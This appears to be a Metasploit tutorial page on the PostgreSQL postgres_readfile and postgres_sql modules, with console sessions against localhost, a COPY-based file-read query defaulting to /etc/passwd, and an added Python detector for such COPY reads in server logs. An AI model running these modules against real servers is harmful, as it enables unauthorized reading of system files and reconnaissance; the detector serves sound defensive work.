Metasploit Auxiliary Modules: Admin Postgres

postgres_readfile

When supplied with valid credentials for a PostgreSQL server, the "postgres_readfile" module reads and displays a file of your choosing from that server.

msf > use auxiliary/admin/postgres/postgres_readfile 
msf auxiliary(postgres_readfile) > show options

Module options (auxiliary/admin/postgres/postgres_readfile):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RFILE     /etc/passwd      yes       The remote file
   RHOST                      yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output


To configure the module, we set the PASSWORD and RHOST values, set RFILE to the file we want to read, and let the module run.

msf auxiliary(postgres_readfile) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(postgres_readfile) > set RFILE /etc/hosts 
RFILE => /etc/hosts
msf auxiliary(postgres_readfile) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(postgres_readfile) > run

Query Text: 'CREATE TEMP TABLE UnprtSRXpcuMpN (INPUT TEXT);
			COPY UnprtSRXpcuMpN FROM '/etc/hosts';
			SELECT * FROM UnprtSRXpcuMpN'
======================================================================================================================================

    input
    -----
    127.0.0.1       localhost
    127.0.1.1       ph33r
    
    # The following lines are desirable for IPv6 capable hosts
    ::1     ip6-localhost ip6-loopback
    fe00::0 ip6-localnet
    ff00::0 ip6-mcastprefix
    ff02::1 ip6-allnodes
    ff02::2 ip6-allrouters
    ff02::3 ip6-allhosts

[*] Auxiliary module execution completed
msf auxiliary(postgres_readfile) >
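
The query text printed above (CREATE TEMP TABLE, then COPY ... FROM a server-side path) is what a defender sees in the PostgreSQL log when statement logging is on. The following Python detector is an added example, not part of the original page or of Metasploit; the log lines are constructed, and the log_line_prefix format and the ETL allowlist directory are assumptions.

```python
import re

# Constructed PostgreSQL server log (assumes log_statement = 'all' and
# log_line_prefix = '%m [%p] %u@%d '); continuation lines start with a tab.
SAMPLE_LOG = """\
2018-06-14 19:02:11.120 UTC [4312] postgres@template1 LOG:  statement: CREATE TEMP TABLE UnprtSRXpcuMpN (INPUT TEXT);
\t\t\t\tCOPY UnprtSRXpcuMpN FROM '/etc/hosts';
\t\t\t\tSELECT * FROM UnprtSRXpcuMpN
2018-06-14 19:03:40.008 UTC [4320] app@shop LOG:  statement: COPY orders FROM STDIN
2018-06-14 19:04:02.551 UTC [4331] etl@shop LOG:  statement: copy staging (a, b) from E'/var/lib/etl/in.csv' with (format csv)
2018-06-14 19:05:10.000 UTC [4340] app@shop LOG:  statement: SELECT 'COPY t FROM nothing'
"""

ENTRY_START = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}")
STATEMENT = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[\d+\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$", re.S)
# COPY <table> [(cols)] FROM '<path>': a server-side file read. COPY ... FROM STDIN
# (client-supplied data) has no quoted path and does not match.
SERVER_COPY = re.compile(
    r"\bCOPY\s+[\w.\"]+(?:\s*\([^)]*\))?\s+FROM\s+E?'(?P<path>(?:[^']|'')*)'", re.I)
ALLOWED_PREFIXES = ("/var/lib/etl/",)  # assumption: directory used by a legitimate ETL job

def entries(log_text):
    """Group physical lines into logical log entries (a timestamp starts a new one)."""
    current = []
    for line in log_text.splitlines():
        if ENTRY_START.match(line) and current:
            yield "\n".join(current)
            current = []
        current.append(line)
    if current:
        yield "\n".join(current)

def find_server_side_copy(log_text):
    """Return one finding per COPY ... FROM '<path>' outside the allowlist."""
    findings = []
    for entry in entries(log_text):
        m = STATEMENT.match(entry)
        if not m:
            continue
        for c in SERVER_COPY.finditer(m["sql"]):
            if not c["path"].startswith(ALLOWED_PREFIXES):
                findings.append({"time": m["ts"], "user": m["user"],
                                 "database": m["db"], "path": c["path"]})
    return findings

if __name__ == "__main__":
    for f in find_server_side_copy(SAMPLE_LOG):
        print("server-side COPY: {user}@{database} read {path} at {time}".format(**f))
```

Server-side COPY from a file requires superuser rights (or membership in pg_read_server_files on PostgreSQL 11 and later), so a finding also identifies an account whose privileges and password deserve review.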


postgres_sql

When supplied with valid credentials for a PostgreSQL server, the "postgres_sql" module executes a query of your choosing and returns the results.

msf > use auxiliary/admin/postgres/postgres_sql
msf auxiliary(postgres_sql) > show options

Module options (auxiliary/admin/postgres/postgres_sql):

   Name           Current Setting   Required  Description
   ----           ---------------   --------  -----------
   DATABASE       template1         yes       The database to authenticate against
   PASSWORD                         no        The password for the specified username. Leave blank for a random password.
   RETURN_ROWSET  true              no        Set to true to see query result sets
   RHOST                            yes       The target address
   RPORT          5432              yes       The target port
   SQL            select version()  no        The SQL query to execute
   USERNAME       postgres          yes       The username to authenticate as
   VERBOSE        false             no        Enable verbose output


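This module requires minimal configuration: we set our PASSWORD and RHOST values, keep the default query that retrieves the server version, and let it run against our target.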

msf auxiliary(postgres_sql) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(postgres_sql) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(postgres_sql) > run

Query Text: 'select version()'
==============================

    version
    -------
    PostgreSQL 8.3.8 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Ubuntu 4.3.2-1ubuntu11) 4.3.2

[*] Auxiliary module execution completed
msf auxiliary(postgres_sql) >

Published: 2018-06-14 19:17:34  Category: Metasploit
Last updated: 2018-06-14 19:17:34
付杰